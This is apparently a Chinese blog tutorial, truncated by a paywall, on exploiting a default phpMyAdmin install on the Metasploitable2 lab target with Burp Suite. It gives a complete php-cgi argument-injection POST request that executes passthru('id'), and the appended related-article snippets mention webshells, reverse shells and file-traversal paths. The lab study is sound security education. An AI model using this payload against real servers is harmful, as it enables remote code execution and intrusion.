手动漏洞挖掘 phpMyAdmin默认安装

最新推荐文章于 2024-09-23 22:41:54 发布
原创 最新推荐文章于 2024-09-23 22:41:54 发布 · 1.4k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#kali #web渗透 #php #phpMyAdmin #漏洞挖掘

手动漏洞挖掘(一)

学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。

—— phpMyAdmin默认安装漏洞——

需要的工具:

  1. burpsuit
  2. 靶机(我选择的是Metasploitable2)

phpMyAdmin漏洞
安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup。
1.我们可以探索PHP网站(可根据banner等信息判断)的phpmyadmin目录是否可以访问(扫描工具/手动爬网)
2.可以尝试../phpMyAdmin/setup目录是否可以访问【可以不需要身份认证的情况下,对服务器进行配置】

一.利用漏洞重放数据

首先在burpsuite的Repeater输入以下代码:

    POST 
    http://192.168.52.130/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
    Host: 192.168.20.10
     
    <?php
    passthru('id');
    die(); 
    ?>

代码的意思是

?-d+allow_url_include%3d1±d
+auto_prepend_file%3dphp://input HTTP/1.1
“?”后面代码含义:PHP的主配置文件.ini进行修改
allow_url_include: 对服

最低0.47元/天 解锁文章

200万优质内容无限畅学
27、网络漏洞剖析与利用实践
bush的博客
07-01 37
本文深入探讨了常见的网络管理接口、代理服务以及权限提升方法,重点分析了Apache Tomcat、Webmin和phpMyAdmin漏洞利用过程,同时介绍了Squid代理的测试与利用技巧,以及通过DirtyCOW漏洞实现权限提升的实践。文章旨在帮助网络安全从业者更好地理解安全风险并采取相应的防护措施。
关于phpMyAdmin默认安装漏洞的学习笔记
Mi1k7ea
03-01 6126
简单地说,phpMyAdmin安装Web服务器上的接口界面,主要用于使用php来管理安装在服务器上的后台数据库。在老的版本中,若管理员没有对相应配置信息进行处理的话就会导致漏洞的存在。在dvwa中phpMyAdmin默认安装中会存在漏洞,用户可以在路径中不需要输入账号密码就可以直接访问其中的phpMyAdmin/setup目录: http://10.10.10.137/phpMyAdmin
记【phpMyAdmin默认安装漏洞
初学者L_言的博客
11-11 4423
一、工具 BrupSuit kali 靶机 Metasploitable2 只要是基于php-mysql 的服务器(靶机) 一般都可尝试去查看是否存在这个漏洞 二、 /setup 目录 mysql默认安装是会产生 /phpMyAdmin 这个目录, 而这个目录下有个 /setup 目录 这个目录可以在不登入的情况下访问,并对服务器的数据库进行配置 e.g. 基于安全考虑,一般服务器在配置好数据...
手工挖洞学习笔记:phpMyAdmin 默认安装漏洞(小白自学)/写入webshell/写入php反弹shell
AI_Jardon的博客
08-12 1187
phpMyAdmin 默认安装 工具: (1)burpsuite (2)靶机:Metasploitable2 前提: 靶机IP:192.168.1.175 由于是http协议,所以端口:80 验证漏洞 到达靶机源url 在url中插入:…//phpMyAdmin/setup 得到: 说明存在phpMyAdmin默认安装漏洞 利用漏洞 打开burpsuite —进入repeater 如图: 开始利用漏洞: 首先:编写目标IP、端口 输入前提上的目标IP、端口 注意:此处use HTTPS 针对于使用
默认安装phpMyAdmin 会存在哪些安全隐患
发哥微课堂
12-20 2149
0x00:简介 phpMyAdmin 大家很熟悉了,很多服务器都会默认安全,用来管理数据库。默认安装的情况下会存在一些安全隐患。 0x01:隐患 首先是默认的 setup 目录,phpMyAdmin 安装后的 setup 目录可以直接访问,这个目录可以执行一些操作,暴露一些隐私信息,如下图: 其次是,可以通过 phpMyAdmin 来修改 php 的 ini 配置文件,这意味着可以配置...
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 3264
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
kali渗透学习-web渗透手动漏洞挖掘(一)
weixin_43239236的博客
01-23 880
流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。 漏洞类型–phpMyadmin远程命令执行漏洞 1、攻击原理和思路 安装web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup。 a.探索PHP网站(可根据banner等信息判断)的phpmyadmin目录是否可以访问(扫
手动漏洞挖掘-SQL注入小谈
含笑
04-25 7823
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 服务器端程序将用户输入参数做为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数
手动挖掘默认安装漏洞
Louisnie
09-28 872
phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 其安装Web服务器上的接口界面,主要用于使用php来管理安装服务器上的后台数据库(MySQL数据库),但如果采用默认安装,敏感路径未做出处理,便会存在安全漏洞,最突出的是其setup脚本中存在着服务器端请求伪造漏洞。远...
PhpMyAdmin漏洞利用汇总
艾欧尼亚归我了
10-18 1736
PhpMyAdmin漏洞利用汇总 目录 0x01 信息收集 1.1 版本信息获取 1.2 绝对路径获取 0x02 PhpMyAdmin利用 2.1 写入文件GetShell 2.2 User defined funct ion(UDF): 2.3 MOF提权: 0x03 PhpMyAdmin漏洞利用 3.1 WooYun-2016-199433:任意文件读取漏洞 3.2 CVE-2014 -8959:本地文件包含 3.3 CVE-2016-5734 :后台命令执行R
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
weixin_63231007的博客
10-08 3065
_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。
总结分析 | 基于phpmyadmin渗透测试
小司机的奥拓
09-22 4097
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
phpmyadmin getshell总结
渗透之路,攻防之间皆学问
10-25 5410
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
php-cgi漏洞利用
最新发布
qq_54030686的博客
09-23 573
msf生成php后门,然后直接替换POST中data的木马,但是这种模式有很大的局限性,回连是可以回连,执行命令等情况,经常会断开,可能是因为php不能够重复执行命令的原因。这里有两种检测方式,第一种是通过检测返回包中的特定字符,第二种是通过网站状态码进行检测,都能找到大冤种,字典的话,当然了,如果不是默认路径的话,最简单的利用方式就是换盘符,也就是CDEFG都访问一下,那么写个py脚本,直接利用。对喽,这里只是关于这个漏洞的利用方式,具体分析的可以看,,也就是xampp的默认目录,
PHP最佳实践:allow_url_fopen和allow_url_include的用法
高性价比服务器就选:蓝易云
05-06 681
更糟的是,一旦外部脚本成功地融入你的代码,它甚至能以你服务器的身份进行操作,这无疑是一场安全性的噩梦。一切的关键在于控制,理解它们,尊重它们,并且聪明地运用它们。但是,既然这样强大,麻烦就来了,恶意用户可以利用此设置进行不良行为,比如在你的脚本中加载外部的恶意代码,结果你的服务器可能会丧失控制。因此,必须谨慎使用,并保证你从可信赖的源获取数据,或者有强大的错误处理和验证机制。,你可以重构代码,尽量不使用URL包含文件,尤其是在动态路径的情况下,为未知的输入加上严格的过滤和校验,避免不良文件的包含。
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 4万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
阿里云服务器漏洞phpmyadmin CVE-2016-6617解决方法
自古红蓝出CP的博客
07-04 4121
phpmyadmin CVE-2016-6617
php漏洞靶场,CTF靶场训练-目遍历漏洞
weixin_32557949的博客
03-23 435
Background路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过槽中带有“点-斜线(..)” 序列及其变化的文件或使用绝对文件路径来应用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置或关键系统文件。 这种攻击也称为“点-点斜线”、 “目录遍历”、 “目录爬升” 和 “回溯” 。实验环境攻击机 kali linux : 10.0.2...
渗透测试实战6——billu靶机入侵
浅浅的博客
05-10 1434
目录 一、实验环境 二、实验步骤 主动信息收集 端口探测——80端口(http) 文件包含getshell 提权 查找数据库配置文件 一、实验环境 攻击机(Kali):192.168.247.165 靶机(billu):192.168.247.166 二、实验步骤 主动信息收集 1、主机发现 2、端口扫描 靶机...
邓炜教程:手动安装PHP环境与phpmyadmin配置
"邓炜PHP环境手动安装教程涵盖了PHP的介绍、PHP+Apache+MySQL环境的搭建,特别是phpmyadmin的部署方法。邓炜是主讲人,提供了联系方式和相关学习资源网站。 在PHP的介绍中,PHP是一种广泛使用的开源脚本语言,特别...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值